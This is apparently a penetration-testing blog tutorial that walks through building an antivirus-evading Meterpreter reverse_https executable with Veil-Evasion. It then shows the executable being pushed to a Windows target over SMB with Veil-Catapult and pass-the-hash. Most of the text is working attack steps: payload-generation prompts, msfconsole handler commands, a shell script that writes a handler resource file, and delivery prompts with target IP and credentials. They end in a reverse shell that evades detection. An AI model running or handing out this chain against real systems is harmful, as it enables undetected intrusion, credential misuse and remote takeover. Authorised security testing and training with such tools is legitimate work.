Last time I wrote an article about delivering a payload with PsExec, but Metasploit's psexec module and its stock .exe templates being flagged and blocked by antivirus is a common problem for penetration testers.
The big question, then, is how to upload and execute a payload of our own choosing. One excellent tool for that is SMBexec, which accomplishes the same goal by using a patched version of Samba to upload .exe files and trigger them.
We already know the Veil-Framework; its authors recently added a payload delivery tool, Veil-Catapult. It works much like SMBexec: it uses Veil-Evasion to generate AV-evading binaries, Impacket to upload the binaries or host them on a temporary SMB server, and the passing-the-hash toolkit to trigger execution.
When the binary is hosted rather than uploaded, the target loads it straight from the attacker's SMB share and runs it without the file ever being written to the target's disk, so an executable that an on-disk scan would catch can slip past detection (it is still visible in memory and on the wire).
Its EXE delivery integrates seamlessly with Veil-Evasion: we can point it at a custom executable, or drop straight into the Veil-Evasion generation menu and build a payload on the fly. Because this invokes the existing payload codebase directly, all the latest methods and modules are available as soon as they are released. After choosing our options and building the executable, we are dropped back into the Veil-Catapult menu to supply target information. Another nice feature is that it accepts either a single IP or a list of targets.
So we are going to create a custom executable with Veil-Evasion and deliver it to the target machine with Veil-Catapult, without being caught by AV.
First we need to create an undetectable executable with Veil-Evasion; to install Veil-Evasion, follow the previous post, Evading-Antivirus.
Once Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.
After executing the Veil-Evasion.py Python script, the Veil menu appears. At the time of writing it has 31 payloads:
You can list all the payloads with the "list" command:
[>] Please enter a command: list
[>] Please enter a command: use 10
I am going to use the cs/meterpreter/reverse_https payload, so I type "use 10" and press Enter. It loads that component, as shown below:
This HTTPS stager wraps the whole communication path in SSL/TLS, so the traffic between the payload and our handler is encrypted.
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “80”
Next, I issue the "generate" command and press Enter to create the executable; Veil then asks for the name of the payload.
Now we need to set up Metasploit to listen for the Meterpreter reverse_https connection on port 80. The handler's PAYLOAD must match the stager we built (windows/meterpreter/reverse_https); port 80 is an unusual choice for HTTPS but works as long as the handler listens on the same port, whereas a reverse_tcp handler would never accept this connection.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.31.20
msf exploit(handler) > set LPORT 80
msf exploit(handler) > exploit -j
msf exploit(handler) > jobs
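Because a stager/handler mismatch silently produces no session, the following POSIX shell helper (an added example, not code from the original post or from the Veil project) maps a Veil-Evasion stager name to the matching multi/handler PAYLOAD, sanity-checks LPORT, and writes a resource script that can be loaded with msfconsole -r. The accepted stager-name patterns, the ExitOnSession setting and the resource-file layout are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example: build a Metasploit handler that matches a Veil-Evasion stager.
# Assumes stager names of the form <lang>/meterpreter/<stager> (an assumption,
# not Veil-Evasion's documented naming) and a resource file loaded with
# `msfconsole -r handler.rc`.

# Map the Veil-Evasion stager to the Metasploit payload the handler must use.
# A reverse_https stager will not connect back to a reverse_tcp handler,
# even when both use the same port.
handler_payload() {
    case "$1" in
        */meterpreter/rev_https|*/meterpreter/reverse_https) echo windows/meterpreter/reverse_https ;;
        */meterpreter/rev_http|*/meterpreter/reverse_http)   echo windows/meterpreter/reverse_http ;;
        */meterpreter/rev_tcp|*/meterpreter/reverse_tcp)     echo windows/meterpreter/reverse_tcp ;;
        *) return 1 ;;
    esac
}

# LPORT must be a plain integer in 1..65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Write the multi/handler resource script to $4 and print the payload chosen.
# Returns non-zero (and writes nothing) if the stager is unknown or LPORT is bad.
write_handler_rc() {
    stager=$1; lhost=$2; lport=$3; out=$4
    payload=$(handler_payload "$stager") || { echo "unknown stager: $stager" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
    echo "$payload"
}

# Usage (values from this post): write_handler_rc cs/meterpreter/reverse_https 192.168.31.20 80 handler.rc
```

ExitOnSession false keeps the job alive after the first Meterpreter session checks in, which matters when the executable is delivered to a whole target list rather than a single host.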
The jobs command shows our running reverse_https handler. Now we use Veil-Catapult to deliver the executable over SMB to the target.
To install Veil-Catapult, follow the previous post; once it is installed, just run the script inside the Veil-Catapult directory.
Veil-Catapult extends the existing Veil framework by using various methods to deliver and trigger payloads across targeted machines. It also ships its own standalone payload techniques, such as the Barebones Python Injector, but since we have already created our executable we move straight to the EXE delivery part.
[>] Enter EXE path, or [enter] to use Veil-Evasion: /root/veil-output/compiled/install.exe
[>] Enter a target IP or target list: 192.168.31.2
[>] Enter a [domain/]username or credump file: sathish
[>] Enter a password or LM:NTLM hash: bhuvi
[>] Use pth-[wmis] (default) or pth-[winexe]? winexe
[>] Would you like to [h]ost the .exe or [u]pload it (default)?
[>] Warning: python payloads MUST be uploaded! : u
[>] Press enter to launch:
Above I entered the path of the executable created by Veil-Evasion, the target IP, and the SMB credentials.
Triggering uses the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis does not create a service (the process runs in the context of the supplied account), while pth-winexe installs a service and runs as SYSTEM, so the choice is situation dependent: the service install gives higher privileges but is noisier and more likely to be logged. Payloads can either be uploaded to the victim and triggered there, or hosted on a temporary Impacket SMB server on the attacker's machine and triggered through a \\UNC path.
In the hosted case the executable is loaded into memory without touching the victim's disk, so an otherwise disk-detectable executable can bypass on-disk AV scanning; as the prompt above warns, the python-based payloads must be uploaded instead.
Whenever an exe is uploaded or hosted and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on the popped hosts.
Finally, the executable runs and we get a Meterpreter session, while AV is still searching...